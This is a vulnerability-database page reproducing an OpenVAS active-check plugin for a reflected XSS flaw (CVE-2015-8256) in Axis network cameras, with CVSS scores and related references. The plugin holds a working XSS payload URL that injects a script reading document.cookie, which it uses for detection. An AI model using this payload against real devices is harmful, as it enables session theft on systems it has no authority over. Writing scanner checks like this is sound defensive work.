Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2016 Greenbone AGOPENVAS:1361412562310807676
HistoryApr 20, 2016 - 12:00 a.m.

Axis Network Cameras Multiple XSS Vulnerabilities (Apr 2016) - Active Check

2016-04-2000:00:00
Copyright (C) 2016 Greenbone AG
plugins.openvas.org
22

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

57.6%

JSON

Axis Network Cameras is prone to multiple cross-site scripting
(XSS) vulnerabilities.

# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.807676");
  script_version("2024-04-05T15:38:49+0000");
  script_tag(name:"last_modification", value:"2024-04-05 15:38:49 +0000 (Fri, 05 Apr 2024)");
  script_tag(name:"creation_date", value:"2016-04-20 15:15:28 +0530 (Wed, 20 Apr 2016)");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2017-04-25 00:40:00 +0000 (Tue, 25 Apr 2017)");

  script_cve_id("CVE-2015-8256");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_tag(name:"solution_type", value:"WillNotFix");

  script_name("Axis Network Cameras Multiple XSS Vulnerabilities (Apr 2016) - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2016 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"Axis Network Cameras is prone to multiple cross-site scripting
  (XSS) vulnerabilities.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"insight", value:"The flaws exist due to an improper sanitization of the
  'imagePath' parameter in the 'view.shtml' script.");

  script_tag(name:"impact", value:"Successful exploitation will allow attackers to run arbitrary
  code on a victim's browser and computer if combined with another flaws in the same devices.");

  script_tag(name:"affected", value:"Multiple Axis Network products.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore. General
  solution options are to upgrade to a newer release, disable respective features, remove the
  product or replace the product by another one.");

  script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/39683");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port(default: 80);

res = http_get_cache(port: port, item: "/view/view.shtml");

if (!res || ">Live view  - AXIS" >!< res || "Camera<" >!< res)
  exit(0);

url = "/view/view.shtml?imagePath=0WLL</script><script>alert(document.cookie)</script><!--";

if (http_vuln_check(port: port, url: url, check_header: TRUE,
                    pattern: "<script>alert\(document\.cookie\)</script>",
                    extra_check: make_list("Live view  - AXIS", "camera"))) {
  report = http_report_vuln_url(port: port, url: url);
  security_message(port: port, data: report);
  exit(0);
}

exit(99);

Related

cvelist 1
zdt 2
prion 1
packetstorm 1
exploitpack 1
cve 1
nvd 1
exploitdb 1
cvelist
cvelist
CVE-2015-8256
2017-04-17 16:00:00
zdt
zdt
Axis Network Cameras - Multiple Vulnerabilities
2016-04-11 00:00:00
AXIS Network Camera Cross Site Scripting Vulnerability
2017-03-17 00:00:00
prion
prion
Cross site scripting
2017-04-17 16:59:00
packetstorm
packetstorm
AXIS Network Camera Cross Site Scripting
2017-03-17 00:00:00
exploitpack
exploitpack
Axis Network Cameras - Multiple Vulnerabilities
2016-04-11 00:00:00
cve
cve
CVE-2015-8256
2017-04-17 16:59:00
nvd
nvd
CVE-2015-8256
2017-04-17 16:59:00
exploitdb
exploitdb
Axis Network Cameras - Multiple Vulnerabilities
2016-04-11 00:00:00

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

57.6%

JSON
Related for OPENVAS:1361412562310807676
cvelist1zdt2prion1packetstorm1exploitpack1cve1nvd1exploitdb1